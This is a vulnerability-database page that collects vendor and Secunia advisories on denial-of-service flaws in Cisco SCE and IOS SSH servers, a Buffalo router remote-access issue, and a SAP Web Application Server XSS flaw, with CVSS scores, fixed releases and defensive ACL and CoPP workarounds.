VARIoT IoT vulnerabilities database

The SSH server in (1) Cisco Service Control Engine (SCE) before 3.1.6, and (2) Icon Labs Iconfidant SSH before 2.3.8, allows remote attackers to cause a denial of service (device restart or daemon outage) via a high rate of login attempts, aka Bug ID CSCsi68582. The Icon Labs Iconfidant SSH server contails multiple vulnerabilities. The most severe of these issues may allow an attacker to cause a vulnerable system to crash. The problem is Bug IDs CSCsi68582 It is a problem.Service disruption by a third party through frequent login attempts (DoS) There is a possibility of being put into a state. Versions prior to Iconfidant SSH 2.3.8 are vulnerable. Attackers can leverage these issues to disrupt system stability or cause devices to reload. Successful exploits will deny service to legitimate users. SCE devices running versions prior to SCOS (Service Control Operating System) 3.1.6 may be affected. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. Successful exploitation of these vulnerabilities requires that the SSH server is enabled (not enabled by default). SOLUTION: Update to version 3.1.6. http://www.cisco.com/pcgi-bin/tablebuild.pl/scos PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. The first vulnerability may be triggered during SSH login activity that is conducted within aggressive time frames. The second vulnerability may be triggered with normal SSH login activity in combination with other SCE management actions occurring simultaneously. The third vulnerability may be triggered during SSH login and is specific to the usage of unique invalid authentication credentials. Cisco has made free upgrade software available to address these vulnerabilities for affected customers. There are no workarounds for these vulnerabilities. Note: These vulnerabilities are independent of each other; a device may be affected by one vulnerability and not by the others. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml. Note: The SCE SSH server is disabled by default. The following example shows a Cisco SCE that runs software release 3.1.6: SCE2000#>show version System version: Version 3.1.6 Build 157 Build time: Mar 31 2008, 18:58:49 (Change-list 303626) Software version is: Version 3.1.6 Build 157 Products Confirmed Not Vulnerable +-------------------------------- No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Cisco SCE 1000 and 2000 series devices provide high-capacity advanced application-level bandwidth optimization, stateful application inspection, session-based classification and control of network traffic. The SCE solution allows for the detection and control of network applications including: web browsing, multimedia streaming, and peer-to-peer (P2P). This Security Advisory describes multiple distinct vulnerabilities. These vulnerabilities are independent of each other. Specific SSH processes may encounter temporary resource unavailability if called within aggressive intervals. This vulnerability is documented in Cisco Bug ID CSCsi68582 and has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-0534. * SSH login activity leads to illegal Input/Output operations A second vulnerability exists in the SCE SSH server that may be triggered with normal SSH traffic to the SCE management interface occurring in conjunction with other management tasks. During this event, an illegal IO operation may impact the SCE management agent, requiring a reboot of the SCE to recover management access. This vulnerability is documented in Cisco Bug ID CSCsh49563 and has been assigned CVE ID CVE-2008-0536. * SCE SSH authentication sequence anomaly A third vulnerability exists in the SCE SSH server that may also be triggered during the SSH login process but unrelated to login attempt frequency or other concurrent management tasks. This issue is triggered by the usage of specific SSH credentials that attempt to change the authentication method, resulting in an authentication sequence anomaly impacting system stability. This vulnerability is documented in Cisco Bug ID CSCsm14239 and has been assigned CVE ID CVE-2008-0535. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding VSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html. Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss. * System vulnerability to SSH login activity (CSCsi68582) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * SSH login activity leads to illegal I/O operations (CSCsh49563) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * SCE SSH authentication sequence anomaly (CSCsm14239) CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities may result in the loss of management access or, in some cases, cause vulnerable SCE devices to reload. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. The following list contains the first fixed software release for each vulnerability: +---------------------------------------+ | | Affected | First | | Vulnerability | Major | Fixed | | | Release | Release | |------------------+----------+---------| | System | 1.x | 3.1.6 | |vulnerability to |----------+---------| | SSH login | 2.x | 3.1.6 | |activity |----------+---------| | | 3.x | 3.1.6 | |------------------+----------+---------| | | 1.x | 3.0.7 | |SSH login |----------+---------| | activity leads | 2.x | 3.0.7 | |to illegal IO |----------+---------| | operations | 3.x | 3.0.7, | | | | 3.1.0 | |------------------+----------+---------| | | 1.x | 3.1.6 | |SCE SSH |----------+---------| | authentication | 2.x | 3.1.6 | |sequence anomaly |----------+---------| | | 3.x | 3.1.6 | +---------------------------------------+ SCOS software version 3.1.6 contains the fixes for all vulnerabilities described in this document. SCOS software is available for download from the following location on cisco.com: http://www.cisco.com/pcgi-bin/tablebuild.pl/scos?psrtdcat20e2 Workarounds =========== There are no workarounds for these vulnerabilities. Restricting SCE SSH management interface access to only trusted devices through the use of SCE ACLs or Transit ACLs is strongly recommended. Additional information about SCE ACLs is available in the "Configuring the Management Interface and Security" section of the SCE Software Configuration Guide: http://www.cisco.com/en/US/products/ps6134/products_configuration_guide_chapter09186a00808498b9.html#wp1060396 Additional information about tACLs is available in Transit Access Control Lists: Filtering at Your Edge: http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml. Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. The SSH login activity vulnerability was discovered during the resolution of customer support cases. The illegal Input/Output operation and authentication sequence anomaly were discovered by Cisco during internal testing. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at: http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +------------------------------------------------------------+ | Revision 1.0 | 2008-May-21 | Initial public release. | +------------------------------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. +-------------------------------------------------------------------- Copyright 2007-2008 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- Updated: May 21, 2008 Document ID: 100706 +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFINE1U86n/Gc8U/uARAt0+AJ409BqcGWyfNNy1ZxGKj5m0IElUKwCdFCqC iNU22mLg2pFDqnDyLstihPI= =oKHO -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . flooding the vulnerable system with a large amount of packets

Multiple unspecified vulnerabilities in the SSH server in Cisco IOS 12.4 allow remote attackers to cause a denial of service (device restart) via unknown vectors, aka Bug ID (1) CSCsk42419, (2) CSCsk60020, and (3) CSCsh51293. Cisco IOS of SSH server There is a service disruption (DoS) There is a vulnerability that becomes a condition. The problem is Bug ID : CSCsk42419, CSCsk60020, CSCsh51293 It is a problem.Service disruption by a third party (DoS) There is a possibility of being put into a state. Successfully exploiting these issues allows remote attackers to generate spurious memory-access errors or cause the targeted device to reload. Repeated attacks will lead to denial-of-service conditions. These issues are tracked by Cisco Bug IDs CSCsk42419, CSCsk60020, and CSCsh51293. These issues affect devices running 12.4-based IOS releases that have SSH configured. Note that SSH is not configured by default. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. SOLUTION: Update to a fixed version (please see the vendor's advisory for details). PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20080521-ssh.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-1159 has been assigned to this vulnerability. The IOS secure shell server is disabled by default. To determine if SSH is enabled, use the show ip ssh command. Router#show ip ssh SSH Enabled - version 2.0 Authentication timeout: 120 secs; Authentication retries: 3 The previous output shows that SSH is enabled on this device and that the SSH protocol major version that is being supported is 2.0. If the text "SSH Disabled" is displayed, the device is not vulnerable. Possible values for the SSH protocol version reported by IOS are: * 1.5: only SSH protocol version 1 is enabled * 1.99: SSH protocol version 2 with SSH protocol version 1 compatibility enabled * 2.0: only SSH protocol version 2 is enabled For more information about SSH versions in IOS, please check the following URL: http://www.cisco.com/en/US/docs/ios/12_3t/12_3t4/feature/guide/gt_ssh2.html The SSH server is not available in all IOS images. Devices that do not support SSH are not vulnerable. Please consult the table of fixed software in the Software Version and Fixes section for the specific 12.4-based IOS releases that are affected. To determine the software running on a Cisco product, log in to the device and issue the show version command to display the system banner. Cisco IOS software will identify itself as "Internetwork Operating System Software" or simply "IOS". The image name will be displayed between parentheses on the next line of output followed by "Version" and the IOS release name. Other Cisco devices will not have the show version command or will give different output. The following example identifies a Cisco product running IOS release 12.4(17): Cisco IOS Software, C2600 Software (C2600-ADVENTERPRISEK9-M), Version 12.4(17), RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2007 by Cisco Systems, Inc. Compiled Fri 07-Sep-07 16:05 by prod_rel_team ROM: System Bootstrap, Version 12.2(8r) [cmong 8r], RELEASE SOFTWARE (fc1) Router uptime is 1 week, 5 hours, 5 minutes System returned to ROM by power-on System image file is "flash:c2600-adventerprisek9-mz.124-17.bin" Additional information about Cisco IOS release naming is available at http://www.cisco.com/warp/public/620/1.html Products Confirmed Not Vulnerable +-------------------------------- Cisco devices that do not run IOS are not affected. IOS-XR images are not affected. The following IOS release trains are not affected: * 10-based releases * 11-based releases * 12.0-based releases * 12.1-based releases * 12.2-based releases * 12.3-based releases IOS releases prior to 12.4(7), 12.4(13d)JA, and 12.4(9)T are not affected by this vulnerability. No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= Secure shell (SSH) was developed as a secure replacement for the telnet, ftp, rlogin, rsh, and rcp protocols, which allow for the remote access of devices. The main difference between SSH and older protocols is that SSH provides strong authentication, guarantees confidentiality, and uses encrypted transactions. A device with the SSH server enabled is vulnerable. These vulnerabilities are documented in Cisco Bug IDs: * CSCsk42419 ( registered customers only) * CSCsk60020 ( registered customers only) * CSCsh51293 ( registered customers only) Vulnerability Scoring Details ============================= Cisco is providing scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. Cisco will provide a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss * CSCsk42419 - SSHv2 spurious memory access CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsk60020 - SSHv2 spurious memory access CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed * CSCsh51293 - Spurious memory access when SSH packets received CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities may result in a spurious memory access or, in certain cases, reload the device potentially resulting in a DoS condition. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center ("TAC") or your contracted maintenance provider for assistance. Each row of the Cisco IOS software table (below) describes a release train and the platforms or products for which it is intended. If a given release train is vulnerable, then the earliest possible releases that contain the fix (the "First Fixed Release") and the anticipated date of availability for each are listed in the "Rebuild" and "Maintenance" columns. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. The release should be upgraded at least to the indicated release or a later version (greater than or equal to the First Fixed Release label). For more information on the terms "Rebuild" and "Maintenance," consult the following URL: http://www.cisco.com/warp/public/620/1.html IOS releases prior to 12.4(7), 12.4(13d)JA, and 12.4(9)T are not affected by this vulnerability. +----------------------------------------+ | Major | Availability of Repaired | | Release | Releases | |------------+---------------------------| | Affected | First Fixed | Recommended | | 12.0-Based | Release | Release | | Releases | | | |----------------------------------------| | There are no affected 12.0 based | | releases | |----------------------------------------| | Affected | First Fixed | Recommended | | 12.1-Based | Release | Release | | Releases | | | |----------------------------------------| | There are no affected 12.1 based | | releases | |----------------------------------------| | Affected | First Fixed | Recommended | | 12.2-Based | Release | Release | | Releases | | | |----------------------------------------| | There are no affected 12.2 based | | releases | |----------------------------------------| | Affected | First Fixed | Recommended | | 12.3-Based | Release | Release | | Releases | | | |----------------------------------------| | There are no affected 12.3 based | | releases | |----------------------------------------| | Affected | First Fixed | Recommended | | 12.4-Based | Release | Release | | Releases | | | |------------+-------------+-------------| | | 12.4(13f) | | | | | | | | 12.4(16b) | | | 12.4 | | 12.4(18b) | | | 12.4(17a) | | | | | | | | 12.4(18) | | |------------+-------------+-------------| | | Only 12.4 | | | | (13d)JA and | | | | 12.4(13d) | | | | JA1 are | | | 12.4JA | vulnerable, | 12.4(16b) | | | all other | JA3 | | | 12.4JA | | | | releases | | | | are not | | | | affected. | | |------------+-------------+-------------| | 12.4JK | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JMA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JMB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JMC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4JX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4MD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4MR | 12.4(16)MR2 | 12.4(16)MR | |------------+-------------+-------------| | 12.4SW | 12.4(15)SW1 | 12.4(15)SW1 | |------------+-------------+-------------| | | 12.4(9)T6 | | | | | | | | 12.4(11)T4 | | | 12.4T | | 12.4(15)T5 | | | 12.4(15)T2 | | | | | | | | 12.4(20)T | | |------------+-------------+-------------| | 12.4XA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XD | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | | | 12.4XE | first fixed | 12.4(15)T5 | | | in 12.4T | | |------------+-------------+-------------| | | Vulnerable; | | | 12.4XF | first fixed | 12.4(15)T5 | | | in 12.4T | | |------------+-------------+-------------| | 12.4XG | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | | | 12.4XJ | first fixed | 12.4(15)T5 | | | in 12.4T | | |------------+-------------+-------------| | | Vulnerable; | | | 12.4XK | first fixed | 12.4(15)T5 | | | in 12.4T | | |------------+-------------+-------------| | 12.4XL | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XM | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XN | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XQ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XT | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XV | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.4XW | 12.4(11)XW6 | 12.4(11)XW6 | |------------+-------------+-------------| | 12.4XY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.4XZ | Not | | | | Vulnerable | | +----------------------------------------+ Workarounds =========== If disabling the IOS SSH Server is not feasible, the following workarounds may be useful to some customers in their environments. Telnet +----- Telnet is not vulnerable to the issue described in this advisory and may be used as an insecure alternative to SSH. Telnet does not encrypt the authentication information or data; therefore, it should only be enabled for trusted local networks. VTY Access Class +--------------- It is possible to limit the exposure of the Cisco device by applying a VTY access class to allow only known, trusted hosts to connect to the device via SSH. For more information on restricting traffic to VTYs, please consult: http://cisco.com/en/US/products/sw/iosswrel/ps1835/products_command_reference_chapter09186a00800873c8.html#wp1017389 The following example permits access to VTYs from the 192.168.1.0/24 netblock and the single IP address 172.16.1.2 while denying access from anywhere else: Router(config)# access-list 1 permit 192.168.1.0 0.0.0.255 Router(config)# access-list 1 permit host 172.16.1.2 Router(config)# line vty 0 4 Router(config-line)# access-class 1 in Different Cisco platforms support different numbers of terminal lines. Check your device's configuration to determine the correct number of terminal lines for your platform. Infrastructure ACLs (iACL) +------------------------- Although it is often difficult to block traffic transiting your network, it is possible to identify traffic that should never be allowed to target your infrastructure devices and block that traffic at the border of your network. Infrastructure ACLs are considered a network security best practice and should be considered as a long-term addition to good network security as well as a workaround for this specific vulnerability. The ACL example shown below should be included as part of the deployed infrastructure access-list, which will protect all devices with IP addresses in the infrastructure IP address range. A sample access list for devices running Cisco IOS is below: !--- Permit SSH services from trusted hosts destined !--- to infrastructure addresses. access-list 150 permit tcp TRUSTED_HOSTS MASK INFRASTRUCTURE_ADDRESSES MASK eq 22 !--- Deny SSH packets from all other sources destined to infrastructure addresses. access-list 150 deny tcp any INFRASTRUCTURE_ADDRESSES MASK eq 22 !--- Permit all other traffic to transit the device. access-list 150 permit IP any any interface serial 2/0 ip access-group 150 in The white paper titled "Protecting Your Core: Infrastructure Protection Access Control Lists" presents guidelines and recommended deployment techniques for infrastructure protection access lists. This white paper can be obtained here: http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801a1a55.shtml Control Plane Policing (CoPP) +---------------------------- The Control Plane Policing (CoPP) feature may be used to mitigate these vulnerabilities. In the following example, only SSH traffic from trusted hosts and with 'receive' destination IP addresses is permitted to reach the route processor (RP). Note: Dropping traffic from unknown or untrusted IP addresses may affect hosts with dynamically assigned IP addresses from connecting to the Cisco IOS device. access-list 152 deny tcp TRUSTED_ADDRESSES MASK any eq 22 access-list 152 permit tcp any any eq 22 ! class-map match-all COPP-KNOWN-UNDESIRABLE match access-group 152 ! ! policy-map COPP-INPUT-POLICY class COPP-KNOWN-UNDESIRABLE drop ! control-plane service-policy input COPP-INPUT-POLICY In the above CoPP example, the ACL entries that match the exploit packets with the "permit" action result in these packets being discarded by the policy-map "drop" function, while packets that match the "deny" action are not affected by the policy-map drop function. CoPP is available in Cisco IOS release trains 12.0S, 12.2SX, 12.2S, 12.3T, 12.4, and 12.4T. Additional information on the configuration and use of the CoPP feature can be found at the following URL: http://www.cisco.com/en/US/prod/collateral/iosswrel/ps6537/ps6586/ps6642/prod_white_paper0900aecd804fa16a.html Obtaining Fixed Software ======================== Cisco has made free software available to address this vulnerability for affected customers. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/public/sw-license-agreement.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact either "psirt@cisco.com" or "security-alert@cisco.com" for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com Customers using Third-party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreement with third-party support organizations such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but who do not hold a Cisco service contract and customers who purchase through third-party vendors but are unsuccessful at obtaining fixed software through their point of sale should get their upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Have your product serial number available and give the URL of this notice as evidence of your entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including special localized telephone numbers and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. This vulnerability was discovered by Cisco internal testing and customer service requests. Status of This Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at http://www.cisco.com/warp/public/707/cisco-sa-20080521-ssh.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-May-21 | public | | | | release. | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) iEYEARECAAYFAkg0RSMACgkQ86n/Gc8U/uCX8QCaA9y2y/y0uC1DPonlJwMGR1Kd jaMAnAz/4J+L7nxWxhppehcJsr0bGmsA =WzxB -----END PGP SIGNATURE-----

The JP1/Cm2/Network Node Manager (NNM) has vulnerability that can be exploited to cause a denial of service (DoS). A remote attacker could cause a denial of service (DoS).

Some Buffalo routers have a vulnerability that could allow remote access from the WAN side. A remote attacker could exploit this vulnerability to manipulate a router by gaining administrative privileges. By accessing the management interface, a remote attacker could also obtain user's account and password information of the ISP using the save settings function.Configurations could be changed by the remote attacker. As the save configuration stores user's account and password information of ISPs in plain-text format, a remote attacker could steal such information and impersonate a user to gain illegal access.

Cross-site scripting (XSS) vulnerability in the Web GUI in SAP Web Application Server (WAS) 7.0, Web Dynpro for ABAP (aka WD4A or WDA), and Web Dynpro for BSP allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI under bc/gui/sap/its/webgui/. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. SAP Web Application Server 7.0 is vulnerable; other versions may also be affected. ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. Input passed via the URL to the sap/bc/gui/sap/its/webgui/ is not properly sanitised before being returned to the user. The vulnerability is reported in the SAP software components SAP_BASIS 640, 700, 701, and 710. SOLUTION: A solution is available via SAP note 1136770. PROVIDED AND/OR DISCOVERED BY: Digital Security Research Group, dsec.ru ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories 